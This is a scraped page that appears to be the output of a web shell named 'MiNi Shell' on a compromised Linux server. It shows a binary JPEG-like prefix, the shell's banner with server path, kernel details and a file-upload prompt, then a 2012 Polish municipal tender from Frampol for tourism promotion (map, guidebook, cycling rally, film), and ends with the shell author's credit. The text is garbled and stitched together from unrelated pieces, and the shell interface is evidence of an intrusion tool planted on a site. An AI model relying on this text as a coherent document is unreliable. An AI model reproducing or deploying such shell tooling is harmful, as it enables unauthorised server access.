JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120702/230320-N-2012.html

<p class="kh_header"><b>Frampol: Zespół działań promocyjnych Projektu: Pięć zalewów - morze atrakcji</b><br>
<b>Numer ogłoszenia: 230320 - 2012; data zamieszczenia: 02.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Frampola , ul. Radzięcka 8, 23-440 Frampol, woj. lubelskie, tel. 084 6857509 w. 38.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frampol.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zespół działań promocyjnych Projektu: Pięć zalewów - morze atrakcji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są wszechstronne działania promocyjne Projektu Pięć zalewów -morze atrakcji współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Osi Priorytetowej VII. Kultura, turystyka i współpraca międzyregionalna. Działania 7.1. Infrastruktura kultury i turystyki. Kategorii III. Infrastruktura turystyki - projekty lokalne Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013.

Przedmiot zamówienia obejmuje  w szczególności:

1) opracowanie i wydanie mapy turystyczno - krajoznawczej obszaru obejmującego Projekt Pięć  zalewów - morze atrakcji w skali 1 : 50 000 i nakładzie 10.000 egzemplarzy oraz dostarczenie  do siedziby Zamawiającego na swój koszt i ryzyko. Zadanie obejmuje:

  - opracowanie danych fizjograficznych,
  - opracowanie sieci komunikacyjnej,
  - opracowanie informacji zagospodarowania turystycznego z wyraźnym zaznaczeniem: szlaków turystycznych, ścieżek edukacyjnych, obszarów chronionych, pomników przyrody, zabytków itp.,
  - opracowanie projektu graficznego i przedstawienie do akceptacji Zamawiającemu,
  - po akceptacji przez Zamawiającego dwustronne wydrukowanie nakładu w pełnym kolorze  na papierze G-priti mat 135gr na m2 w formacie 960 x 660 mm i skład (składana) 5 + 4.

 2) opracowanie i wydanie przewodnika po szlakach turystycznych: rowerowym, konnych i narciarskich eksponujący wybrane i ważniejsze wartości edukacyjne i krajoznawcze tj.: historię i zabytki w miejscowościach położonych na szlakach turystycznych, zawierający opisy ciekawych miejsc, promujący gminy realizujące Projekt jako obszary ciekawe geograficznie z bogatą historią. Przewodnik ma zawierać aktualną bazę noclegową i gastronomiczną, informacje praktyczne przydatne turyście, kalendarz ważniejszych wydarzeń z terenu. Przewodnik należy dostarczyć  do siedziby Zamawiającego na swój koszt i ryzyko. Zadanie obejmuje:

- opracowanie opisów krajoznawczych przebiegu szlaków turystycznych, 
- sfotografowanie ciekawych przyrodniczo i turystycznie miejsc, 
- zredagowanie tabeli odległościowych poszczególnych miejscowości na szlakach,
- opracowanie projektu graficznego przewodnika (ilość fotogenów 140 + - 10),
- po akceptacji przez Zamawiającego projektu graficznego przewodnika, zawartości treści i fotogenów - wykonanie składu i wydrukowanie nakładu w pełnym kolorze  na papierze creda 150 gr na m2 w formacie 14,5 cm x 21 cm, w objętości 60 - 70 stron, z okładką z papieru kredowego 250 gr na m2 i foliowaną, w nakładzie 2.100 egzemplarzy.

3) opracowanie i wydanie broszury informacyjnej promującej szlak rowerowy oraz imprezę promocyjną na otwarcie szlaku turystycznego ze schematyczną mapą przebiegu szlaku, z najistotniejszymi informacjami o szlaku oraz siedmiu gminach partnerskich (przewiduje się jedną stronę dla danej gminy).  Broszurę należy dostarczyć  do siedziby Zamawiającego na swój koszt i ryzyko. Zadanie obejmuje:

- opracowanie projektu graficznego i treści broszury oraz przedstawienie ich do akceptacji Zamawiającemu,
- po akceptacji przez Zamawiającego wydrukowanie dwustronne nakładu w pełnym kolorze na papierze kredowym, w formacie 397 mm x 210 mm, broszura składana na 7 części, po złożeniu 9 cm x 21 cm, w nakładzie 1.000 szt.

4) impreza promocyjna na otwarcie szlaku turystycznego w ramach Projektu Pięć zalewów - morze atrakcji o charakterze rajdu rowerowego ogólnopolskiego o formule gwiaździstej, a na jego zakończenie festyn dla rodzin, dzieci i turystów przebywających na terenie objętym Projektem.

Główne wyznaczniki imprezy:

- co najmniej 15 rowerowych grup rajdowych startowych,
- w rajdzie powinno brać udział co najmniej 1000 uczestników,
- wymagane jest opracowanie szczegółowego regulaminu oraz warunków uczestnictwa w rajdzie z uwzględnieniem osób młodocianych,
- możliwość wygodnej rejestracji uczestników rajdu (drogą e-mailową lub poprzez stronę internetową) w zakresie dopuszczonym przez prawo i gwarantującą jednocześnie poufność danych osobowych,
- wymagane jest ubezpieczenie uczestników rajdu,
- zapewnienie obsługi technicznej wraz z serwisem rowerowym (minimum 3, w tym jeden mobliny),
- atrakcyjne pakiety startowe (folder, mapa, gadżety, koszulka bawełniana z logo Projektu),
- zapewnienie uczestnikom rajdu rowerowego bufetów z posiłkami na trasie rajdu oraz co najmniej 2 posiłków na gorąco w miejscu zbornym  (miasteczku rajdowym - miejscu pikniku rodzinnego),
- przed rozpoczęciem rajdu powinno być zapewnione szkolenie dla kierowników grup oraz ich asystentów w zakresie czynności przez nich wykonywanych,
- wyposażenie każdej z grup startowych w system łączności radiowej niezależnej od sieci telefonii komórkowej, umożliwiający wezwanie pomocy przewodnikom grup w razie nagłej potrzeby z miejsc o ograniczonym zasięgu telefonii komórkowej (co najmniej 1 radioaparat działający w systemie duplex, z przemiennikiem częstotliwości),
- niezbędna znajomość specyfiki gmin partnerów projektu Pięć zalewów - morze atrakcji,
- wymagana organizacja akcji promocyjnej w mediach (co najmniej 2 wejścia antenowe promujące imprezę w co najmniej 3 portalach społecznościowych, co najmniej 3 artykuły w prasie regionalnej oraz 1 w ogólnopolskiej, akcja plakatowa w co najmniej 3 powiatach na terenie których położone są gminy realizujące Projekt),
- zapewnienie min. 3 wejść antenowych -na żywo- w radiu co najmniej regionalnym,
- prezentacja projektu w formie elektronicznej w miasteczku rajdowym (np. telebim), 
- zapewnienie co najmniej 1 baneru pneumatycznego oraz co najmniej 3 banerów promujących z logo projektu w miasteczku rajdowym,
- miasteczko rajdowe powinno znajdować się w najbardziej dogodnym, atrakcyjnym miejscu na trasie szlaku - zaakceptowanym przez Zamawiającego, powinno być wyposażone w stojaki na rowery oraz sanitariaty, energię elektryczną, nagłośnienie o odpowiedniej mocy oraz oświetlenie (o ile będzie potrzebne), stoiska umożliwiające zakup posiłków i napojów, 
- kierownik imprezy powinien uzyskać stosowne pozwolenia wymagane prawem oraz dysponować prawem do dysponowania gruntem na cele operacji miejsca zbornego - miasteczka rajdowego,
- co najmniej 30 % obsady technicznej rajdu powinno posiadać wielokrotne doświadczenie przy organizacji tego typu imprez na obszarze objętym Projektem,
- w miejscu zbornym powinien być zorganizowany festyn rodzinny z częścią artystyczną przy udziale gwiazdy ogólnopolskiego formatu oraz dwóch zespołów regionalnych,
- konferansjer imprezy powinien być osobą znaną i rozpoznawalną co najmniej w  województwie lubelskim, 
- prowadzenie imprezy w miejscu zbornym w sposób gwarantujący prezentację całego Projektu Pięć zalewów - morze atrakcji oraz gmin partnerów tego projektu (np. organizacja rożnego rodzaju konkursów, zabaw),
- zagwarantowanie odpłatnego przejazdu busami i autobusami dostosowanymi do przewozu rowerów dla uczestników imprezy z punktu zbornego do miejsca startu,
- organizacja niezależnego poczęstunku dla zaproszonych gości (ok. 100 osób),
- organizacja ogólnopolskich imprez towarzyszących (np. zawody MTB),
- dopuszcza się imprezę dwudniową (sobota i niedziela).

5) wyprodukowanie filmu Przewodnik po szlakach Projektu Pięć zalewów - morze atrakcji oraz wyrażenie zgody na jego kopiowanie i odtwarzanie dla celów promocyjnych, dostarczenie  do siedziby Zamawiającego na swój koszt i ryzyko.

Film powinien ukazywać doskonałe miejsce relaksu, jakim są tereny należące do gmin biorących udział w projekcie Pięć zalewów - morze atrakcji. Podpowiada turyście, dokąd warto pojechać, co warto zobaczyć, jakimi szlakami powędrować, czy też pojeździć konno i którymi ścieżkami rowerowymi pojeździć.
Film powinien dawać możliwość zaprezentowania walorów miejscowości lub gminy oraz przedstawienia jej oferty turystycznej. Powinien pokazywać też inwestycje zrealizowane lub planowane w najbliższym czasie, na które przeznaczone były fundusze ze środków Unii Europejskiej lub fundusze własne. Film powinien zawierać fragmenty z imprezy promocyjnej otwierającej szlak turystyczny utworzony w ramach Projektu.

Parametry techniczne filmu:

- czas projekcji filmu 8 - 10 min,
- ilość kopii na nośniku DVD - 700 egzemplarzy wykonanych po zaakceptowaniu przez   
  Zamawiającego,
- opracowanie scenariusza,
- reżyseria filmu,
- wykonanie zdjęć filmowych we wskazanych miejscach,
- kompozycja utworów muzycznych,
- opracowanie i napisanie komentarza do filmu,
- zapewnienie lektora do filmu,
- montaż dźwięku i obrazu,
- transkodowanie do formatów komputerowych,
- tłoczenie nakładu,   
- projekt nadruku na płytę, projekt folderu informacyjnego (okładki do filmu) i druk, 
- przygotowanie 1 kopii filmu w formacie pozwalającym na zamieszczenie na portalu 
  Internetowym.

Materiały drukowane (mapa turystyczno - krajoznawcza, przewodnik po szlakach turystycznych, broszura informacyjna, okładka na płytę, płyty, plakaty), koszulki dla uczestników rajdu, banery promocyjne (pneumatyczny i wiszące) powinny zawierać nazwę Projektu Pięć zalewów - morze atrakcji i logotypy programu w ramach którego został on sfinansowany..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.34.22.00-5, 22.46.20.00-6, 39.29.41.00-0, 55.30.00.00-3, 79.82.30.00-9, 79.95.20.00-2, 92.31.00.00-7, 92.11.12.10-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał jedną usługę w zakresie promocji i reklamy o wartości co najmniej 50.000 zł. w postaci organizowania imprez rowerowych. 
Zamawiający dokona oceny spełniania warunków wymienionych w pkt. 1 na podstawie żądanych w pkt. VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca do wykonania zamówienia wykaże możliwość:
                 - wygodnej rejestracji uczestników rajdu (drogą e-mailową lub poprzez stronę internetową) w zakresie dopuszczonym przez prawo i gwarantującą jednocześnie poufność danych osobowych,
              - wyposażenia każdej z grup startowych w system łączności radiowej niezależnej od sieci telefonii komórkowej, umożliwiający wezwanie pomocy przewodnikom grup w razie nagłej potrzeby z miejsc o ograniczonym zasięgu telefonii komórkowej (co najmniej 1 radioaparat działający w systemie duplex, z przemiennikiem częstotliwości),
                  - zapewnienia obsługi technicznej wraz z serwisem rowerowym (minimum 3, w tym jeden mobliny),
Zamawiający dokona oceny spełniania warunków wymienionych w pkt. 1 na podstawie żądanych w pkt. VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca do wykonania zamówienia zapewni:
a) kierownika rajdu oraz co najmniej 4 osoby posiadające uprawnienia przewodników terenowych po Roztoczu,
b) co najmniej 1 ratownika medycznego na 4 grupy rajdowe,
            c) kierownika imprezy promocyjnej posiadającego stosowne pozwolenia wymagane prawem,
Zamawiający dokona oceny spełniania warunków wymienionych w pkt. 1 na podstawie żądanych w pkt. VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca:

a) posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 100.000,00 zł. (słownie: sto tysięcy złotych);
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności i suma gwarancyjna wynosi co najmniej 100.000,00 zł. (słownie: sto pięćdziesiąt tysięcy złotych);
Zamawiający dokona oceny spełniania warunków wymienionych w pkt. 1 na podstawie żądanych w pkt. VI SIWZ dokumentów i oświadczeń, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany  postanowień umowy.

Postanowienia Umowy mogą ulec zmianie w zakresie:

1) terminu wykonania przedmiotu umowy  i pozostałych terminów określonych w Umowie:

    - poprzez przedłużenie w sytuacji:

a) gdy wystąpią okoliczności, których nie można było przewidzieć, a które  mają istotny      wpływ na terminową realizację umowy,
    b) niedopełnienia przez Zamawiającego określonych w umowie należących do niego            obowiązków,
  c) gdy zaistnieje konieczność przerwania lub zawieszenia wykonywania usług z przyczyn niezawinionych  przez Wykonawcę,
d)  działania siły wyższej uniemożliwiającej realizację przedmiotu umowy,

- poprzez skrócenie w sytuacji gdy zostaną spełnione łącznie dwie przesłanki:

a) Wykonawca wcześniej niż się Strony umówiły w Umowie wykona przedmiot umowy i  Zamawiający uzna, że działania promocyjne zostały zakończone i nie będzie miał zastrzeżeń, co do kompletności i prawidłowości  ich wykonania,
b) Zamawiający będzie w stanie dokonać zapłaty wynagrodzenia Wykonawcy za wcześniej      wykonany przedmiot umowy;

2) wysokości wynagrodzenia Wykonawcy.
W razie zaistnienia okoliczności, których nie można było przewidzieć w chwili składania Oferty i zawarcia Umowy, do których zalicza się tylko ustawową zmianę stawek podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frampol.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski we Frampolu ul.Zamojska 13 23-440 Frampol.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 12:00, miejsce: Urząd Miejski we Frampolu ul. Radzięcka 8 23-440 Frampol pokój nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> RPO woj. Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com